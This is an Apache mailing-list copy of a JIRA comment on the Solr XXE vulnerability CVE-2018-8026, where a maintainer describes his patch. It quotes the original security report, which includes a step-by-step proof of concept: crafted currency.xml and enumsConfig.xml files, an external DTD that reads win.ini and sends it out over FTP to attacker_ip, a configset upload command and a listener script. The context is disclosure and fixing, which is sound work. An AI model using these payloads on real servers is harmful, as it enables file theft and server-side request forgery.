You are viewing a plain text version of this content. The canonical link for it is here.
Posted to dev@lucene.apache.org by "Uwe Schindler (JIRA)" <ji...@apache.org> on 2018/07/04 17:01:00 UTC
[jira] [Comment Edited] (SOLR-12450) CVE-2018-8026: More XXE vulns
in code using DocumentBuilder
[ https://issues.apache.org/jira/browse/SOLR-12450?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16502049#comment-16502049 ]
Uwe Schindler edited comment on SOLR-12450 at 7/4/18 5:00 PM:
--------------------------------------------------------------
I attached a patch fixing those issues. I added all code parts also to exchange rate provider and enum config: [^SOLR-12450.patch]
The reason for this bug was that it was copypasted at some pont in former time, before my fixes to prevent XXE 3 years ago were applied. I am quite sure that i went through all the document builders, so it must have been commited since that.
I will now check at least all DocumentBuilder/DocumentBuilderFactories by searching for db.parse() n the source code and verify their usage.
Maybe we should add a utility method to solr that allows to load a DOM tree (Document) from an XML file in the config directory using SolrResourceLoader. This can be made safe but still support entities and xinclude. Still, I have no idea how to effectively prevent those bugs from appearing agin. Maybe we should forbid direct usage of DocumentBuilder and DocumentBuilder factory by forbiddenapis and just add a supresswarnings in our utility method.
was (Author: thetaphi):
I attached a patch fixing those issues. I added all code parts also to exchange rate provider and enum config: [^SOLR-12450.patch]
The reason for this bug was that it was copypasted at some pont in former time, before my fixes to prevent XXE 3 years ago were applied. I am quite sure that i went through all the document builders, so it must have been commited since that.
I will no check at least all DocumentBuilder/DocumentBuilderFactories by searching for db.parse() n the source code and verify their usage.
Maybe we should add a utility method to solr that allows to load a DOM tree (Document) from an XML file in the config directory using SolrResourceLoader. This can be made safe but still support entities and xinclude. Still, I have no idea how to effectively prevent those bugs from appearing agin. Maybe we should forbid direct usage of DocumentBuilder and DocumentBuilder factory by forbiddenapis and just add a supresswarnings in our utility method.
> CVE-2018-8026: More XXE vulns in code using DocumentBuilder
> -----------------------------------------------------------
>
> Key: SOLR-12450
> URL: https://issues.apache.org/jira/browse/SOLR-12450
> Project: Solr
> Issue Type: Bug
> Security Level: Public(Default Security Level. Issues are Public)
> Components: security
> Affects Versions: 6.6.4, 7.3.1
> Reporter: Uwe Schindler
> Assignee: Uwe Schindler
> Priority: Major
> Fix For: 6.6.5, 7.4
>
> Attachments: SOLR-12450.patch, SOLR-12450.patch, SOLR-12450.patch, SOLR-12450.patch
>
>
> From: yuyang xiao <su...@gmail.com>
> Date: Mon, Jun 4, 2018 at 10:22 AM
> Subject: XXE vulns in lucene-solr
> To: security@apache.org
> Title: XXE vulns in lucene-solr
> Author: XiaoXiong , superxyyang@gmail.com
> Date: 2018-06-04
> Download Site: http://www.apache.org/dyn/closer.lua/lucene/solr/7.3.1
> Vulnerability:
> Recently, I found there are two another XXE Vulnerabilities. unsecure DocumentBuilderFactory is being used to parse currency.xml and enumsConfig.xml .
> I think the problem is as serious as CVE-2018-8010, It can result in reading any file and server side request forgery attack .I think it a dangerous vulnerability that you should limit the xml entity parse.
>
> The location of vulnerability one :
> https://github.com/apache/lucene-solr/blob/master/solr/core/src/java/org/apache/solr/schema/FileExchangeRateProvider.java
> {code:java}
> is = loader.openResource(currencyConfigFile);
> javax.xml.parsers.DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
> try {
> dbf.setXIncludeAware(true);
> dbf.setNamespaceAware(true);
> } catch (UnsupportedOperationException e) {
> throw new SolrException(SolrException.ErrorCode.BAD_REQUEST, "XML parser doesn't support XInclude option", e);
> }
>
> Document doc = dbf.newDocumentBuilder().parse(is);
> {code}
>
> the another xxe vulnerability
> https://github.com/apache/lucene-solr/blob/master/solr/core/src/java/org/apache/solr/schema/AbstractEnumField.java
> {code:xml}
> is = schema.getResourceLoader().openResource(enumsConfigFile);
> final DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
> final Document doc = dbf.newDocumentBuilder().parse(is);
> final XPathFactory xpathFactory = XPathFactory.newInstance();
> final XPath xpath = xpathFactory.newXPath();
> {code}
> The following is the vulnerability detail:
> Detail
> FileExchangeRateProvider Vulnerability
> environment:
> victim :
> Solr version: solr 7.3.1 OS: windows 7 java version "1.8.0_101"IP: victim_ip
> attacker:
> OS: kaliIP: attacker_ip
> Step 1: Create configeset with three files in directory called "test"
> schema.xml: import the currency handler
> {code:xml}
> <schema name="test" version="1.1"> <fieldType name="string" class="solr.StrField"/> <fieldType name="currency" class="solr.CurrencyField" precisionStep="8" defaultCurrency="USD" currencyConfig="currency.xml" /></schema>
> {code}
> currency.xml: import the attack payload
> {code:xml}
> <?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM "http://attacker_ip:9000/xxe.dtd"> %remote; ]> <currencyConfig version="1.0"> <rates> <!-- Updated from http://www.exchangerate.com/ at 2011-09-27 --> <rate from="USD" to="ARS" rate="4.333871" comment="ARGENTINA Peso" /> <rate from="USD" to="AUD" rate="1.025768" comment="AUSTRALIA Dollar" /> <rate from="USD" to="EUR" rate="0.743676" comment="European Euro" /> <rate from="USD" to="CAD" rate="1.030815" comment="CANADA Dollar" /> <!-- Cross-rates for some common currencies --> <rate from="EUR" to="GBP" rate="0.869914" /> <rate from="EUR" to="NOK" rate="7.800095" /> <rate from="GBP" to="NOK" rate="8.966508" /> <!-- Asymmetrical rates --> <rate from="EUR" to="USD" rate="0.5" /> </rates></currencyConfig>
> {code}
> solrconfig.xml: normal config file
> {code:xml}
> <config> <dataDir>${solr.data.dir:}</dataDir> <directoryFactory name="DirectoryFactory" class="${solr.directoryFactory:solr.NRTCachingDirectoryFactory}"/> <schemaFactory class="ClassicIndexSchemaFactory"/> <luceneMatchVersion>7.3.1</luceneMatchVersion> <updateHandler class="solr.DirectUpdateHandler2"> <commitWithin> <softCommit>${solr.commitwithin.softcommit:true}</softCommit> </commitWithin> </updateHandler> <requestHandler name="/select" class="solr.SearchHandler"> <lst name="defaults"> <str name="echoParams">explicit</str> <str name="indent">true</str> <str name="df">text</str> <str name="password">passwdFile</str> </lst> </requestHandler></config>
> {code}
> Step 2: Upload the test directory to Solr using configset upload API:
> {noformat}
> (cd test && zip -r - *) | curl -X POST --header "Content-Type:application/octet-stream" --data-binary @- "http://victim_ip:8983/solr/admin/configs?action=UPLOAD&name=configset1"
> {noformat}
> Step3: ready the xxe.dtd
> for Solr server read xxe.dtd
> python -m SimpleHTTPServer 9000
> xxe.dtd:
> {code:xml}
> <!ENTITY % file SYSTEM "file:///C:/Windows/win.ini"><!ENTITY % int "<!ENTITY % send SYSTEM 'ftp://user:12345@attacker_ip:2121/%file;/'>">%int;%send;
> {code}
> Step4: build the listening with ftp
> python ftpserver.py >> ./ftpserver.log 2>&1 &
> ftpserver.py:
> {noformat}
> import osfrom pyftpdlib.authorizers import DummyAuthorizerfrom pyftpdlib.handlers import FTPHandlerfrom pyftpdlib.servers import FTPServer def main(): # Instantiate a dummy authorizer for managing 'virtual' users authorizer = DummyAuthorizer() # Define a new user having full r/w permissions and a read-only # anonymous user authorizer.add_user('user', '12345', '.', perm='elradfmwMT') authorizer.add_anonymous(os.getcwd(), perm='elradfmwMT') # Instantiate FTP handler class handler = FTPHandler handler.authorizer = authorizer # Define a customized banner (string returned when client connects) handler.banner = "pyftpdlib based ftpd ready." # Instantiate FTP server class and listen on 0.0.0.0:2121 address = ('', 2121) server = FTPServer(address, handler) # set a limit for connections server.max_cons = 256 server.max_cons_per_ip = 5 # start ftp server server.serve_forever() if __name__ == '__main__': main()
> {noformat}
> Step5: Create a collection using this configset. and the file is revealed
> input the url
> http://victim_ip:8983/solr/admin/collections?action=CREATE&name=mybadcoll&numShards=1&collection.configName=configset1"
> read the error response
> {noformat}
> { "responseHeader":{ "status":0, "QTime":32895}, "failure":{ "victim_ip:7574_solr":"org.apache.solr.client.solrj.impl.HttpSolrClient$RemoteSolrException:Error from server at http://victim_ip:7574/solr: Error CREATEing SolrCore 'mybadcoll_shard1_replica_n1': Unable to create core [mybadcoll_shard1_replica_n1] Caused by: CWD ; for 16-bit app support\n[fonts]\n[extensions]\n[mci extensions]\n[files]\n[Mail]\nMAPI=1\nCMCDLLNAME32=mapi32.dll\nCMC=1\nMAPIX=1\nMAPIXVER=1.0.0.1\nOLEMessaging=1\n[MCI Extensions.BAK]\n3g2=MPEGVideo\n3gp=MPEGVideo\n3gp2=MPEGVideo\n3gpp=MPEGVideo\naac=MPEGVideo\nadt=MPEGVideo\nadts=MPEGVideo\nm2t=MPEGVideo\nm2ts=MPEGVideo\nm2v=MPEGVideo\nm4a=MPEGVideo\nm4v=MPEGVideo\nmod=MPEGVideo\nmov=MPEGVideo\nmp4=MPEGVideo\nmp4v=MPEGVideo\nmts=MPEGVideo\nts=MPEGVideo\ntts=MPEGVideo\n:550 File name too long.\n"}}
> {noformat}
> AbstractEnumField Vulnerability
> The process is the same with FileExchangeRateProvider under certain circumstance
> schema.xml:
> {code:xml}
> <schema name="test1" version="1.1"> <fieldType name="string" class="solr.StrField"/> <fieldType name="priorityLevel" class="solr.EnumFieldType" docValues="true" enumsConfig="enumsConfig.xml" enumName="priority"/> <fieldType name="riskLevel" class="solr.EnumFieldType" docValues="true" enumsConfig="enumsConfig.xml" enumName="risk" /></schema>
> {code}
> enumsConfig.xml
> {code:xml}
> <?xml version="1.0" ?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM "http://attacker_ip:9000/xxe.dtd"> %remote;]> <enumsConfig> <enum name="priority"> <value>Not Available</value> <value>Low</value> <value>Medium</value> <value>High</value> <value>Urgent</value> </enum> <enum name="risk"> <value>Unknown</value> <value>Very Low</value> <value>Low</value> <value>Medium</value> <value>High</value> <value>Critical</value> </enum></enumsConfig>
> {code}
--
This message was sent by Atlassian JIRA
(v7.6.3#76005)
---------------------------------------------------------------------
To unsubscribe, e-mail: dev-unsubscribe@lucene.apache.org
For additional commands, e-mail: dev-help@lucene.apache.org